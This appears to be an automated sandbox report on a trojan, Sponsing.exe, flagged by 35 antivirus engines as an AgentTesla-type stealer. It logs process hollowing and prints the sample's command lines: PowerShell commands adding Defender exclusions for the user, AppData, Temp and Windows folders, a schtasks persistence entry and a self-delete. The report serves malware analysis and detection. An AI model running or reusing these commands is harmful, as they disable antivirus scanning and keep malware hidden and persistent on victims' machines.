RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1116 called NtSetContextThread to modify thread in remote process 2076
NtSetContextThread Sept. 14, 2021, 4:14 p.m.	registers.eip: 2000355780 registers.esp: 3013188 registers.edi: 0 registers.eax: 4310510 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000210 process_identifier: 2076	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1116 resumed a thread in remote process 2076
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000210 suspend_count: 1 process_identifier: 2076	1	0	0

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Executed a process and injected code into it, probably while unpacking (50 out of 78 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 1116	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 1116	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x0000019c suspend_count: 1 process_identifier: 1116	1	0
CreateProcessInternalW Sept. 14, 2021, 4:14 p.m.	thread_identifier: 2428 thread_handle: 0x00000210 process_identifier: 2076 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\Sponsing.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000214	1	1
NtUnmapViewOfSection Sept. 14, 2021, 4:14 p.m.	base_address: 0x00400000 region_size: 10485760 process_identifier: 2076 process_handle: 0x00000214		3221225497
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000214	1	0
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL/5và0¸îÅ à@ RÇ@ÅOàÔÈèÅ H.textü· ¸ `.rsrcÔà¼@@.relocÄ@B base_address: 0x00400000 process_identifier: 2076 process_handle: 0x00000214	1	1
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: base_address: 0x00402000 process_identifier: 2076 process_handle: 0x00000214	1	1
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: P8hÔàDD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.08InternalNameSmuggle.exe(LegalCopyright @OriginalFilenameSmuggle.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0äâêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0041e000 process_identifier: 2076 process_handle: 0x00000214	1	1
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: Àð5 base_address: 0x00420000 process_identifier: 2076 process_handle: 0x00000214	1	1
NtGetContextThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000210	1	0
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2076 process_handle: 0x00000214	1	1
NtSetContextThread Sept. 14, 2021, 4:14 p.m.	registers.eip: 2000355780 registers.esp: 3013188 registers.edi: 0 registers.eax: 4310510 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000210 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000210 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x0000028c suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x000003f4 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x000006c0 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000410 suspend_count: 1 process_identifier: 2076	1	0
CreateProcessInternalW Sept. 14, 2021, 4:14 p.m.	thread_identifier: 1032 thread_handle: 0x000007d8 process_identifier: 2288 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\fl.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\fl.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\fl.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007e0	1	1
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000778 suspend_count: 1 process_identifier: 2076	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2288	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x0000000000000138 suspend_count: 1 process_identifier: 2288	1	0
NtResumeThread Sept. 14, 2021, 4:14 p.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 2288	1	0
CreateProcessInternalW Sept. 14, 2021, 4:14 p.m.	thread_identifier: 1468 thread_handle: 0x00000000000001f4 process_identifier: 2088 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000001fc	1	1
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x000000000000022c suspend_count: 1 process_identifier: 2288	1	0
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 2344 thread_handle: 0x0000000000000378 process_identifier: 2264 current_directory: C:\Users\test22\AppData\Roaming filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000380	1	1
CreateProcessInternalW Sept. 14, 2021, 4:14 p.m.	thread_identifier: 2240 thread_handle: 0x0000000000000060 process_identifier: 204 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 2140 thread_handle: 0x0000000000000064 process_identifier: 844 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 2004 thread_handle: 0x0000000000000060 process_identifier: 2616 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Sept. 14, 2021, 4:16 p.m.	thread_identifier: 1064 thread_handle: 0x0000000000000064 process_identifier: 932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x000000000000028c suspend_count: 1 process_identifier: 204	1	0
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x00000000000002e0 suspend_count: 1 process_identifier: 204	1	0
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x0000000000000378 suspend_count: 1 process_identifier: 204	1	0
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x0000000000000414 suspend_count: 1 process_identifier: 204	1	0
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 2668 thread_handle: 0x0000000000000060 process_identifier: 1408 current_directory: C:\Users\test22\AppData\Roaming filepath: C:\Users\test22\AppData\Local\Temp\svchost32.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost32.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 1408	1	0
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x0000000000000138 suspend_count: 1 process_identifier: 1408	1	0
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 1408	1	0
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x0000000000000208 suspend_count: 1 process_identifier: 1408	1	0
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 1748 thread_handle: 0x000000000000037c process_identifier: 412 current_directory: C:\Users\test22\AppData\Roaming filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000384	1	1
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x00000000000003a0 suspend_count: 1 process_identifier: 1408	1	0
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 1444 thread_handle: 0x00000000000003b4 process_identifier: 1304 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\services32.exe track: 1 command_line: "C:\Windows\system32\services32.exe" filepath_r: C:\Windows\system32\services32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003d0	1	1
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x00000000000003b8 suspend_count: 1 process_identifier: 1408	1	0
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 652 thread_handle: 0x00000000000003cc process_identifier: 540 current_directory: C:\Users\test22\AppData\Roaming filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ec	1	1
NtResumeThread Sept. 14, 2021, 4:15 p.m.	thread_handle: 0x00000000000002a0 suspend_count: 1 process_identifier: 844	1	0

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
ALYac	Gen:Variant.Bulz.699108
Cylance	Unsafe
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_70% (D)
Arcabit	Trojan.Bulz.DAAAE4
Cyren	W32/MSIL_Troj.CY.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Kryptik.ACCF
APEX	Malicious
Kaspersky	HEUR:Trojan-PSW.MSIL.Agent.gen
BitDefender	Gen:Variant.Bulz.699108
MicroWorld-eScan	Gen:Variant.Bulz.699108
Avast	Win32:MalwareX-gen [Trj]
Ad-Aware	Gen:Variant.Bulz.699108
Sophos	ML/PE-A
F-Secure	Heuristic.HEUR/AGEN.1144480
DrWeb	Trojan.PackedNET.972
McAfee-GW-Edition	BehavesLike.Win32.Generic.gz
FireEye	Generic.mg.26ec741820379576
Emsisoft	Gen:Variant.Bulz.699108 (B)
Ikarus	Trojan-Spy.MSIL.Agent
Avira	HEUR/AGEN.1144480
Microsoft	Trojan:MSIL/AgentTesla.JPX!MTB
GData	Gen:Variant.Bulz.699108
AhnLab-V3	Trojan/Win.Generic.C4628732
McAfee	GenericRXPZ-KW!26EC74182037
MAX	malware (ai score=82)
Malwarebytes	Malware.AI.4000054032
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_100%
Fortinet	MSIL/Kryptik.ACCF!tr
BitDefenderTheta	Gen:NN.ZemsilF.34142.Bm0@aqHuVAn
AVG	Win32:MalwareX-gen [Trj]

Sponsing.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All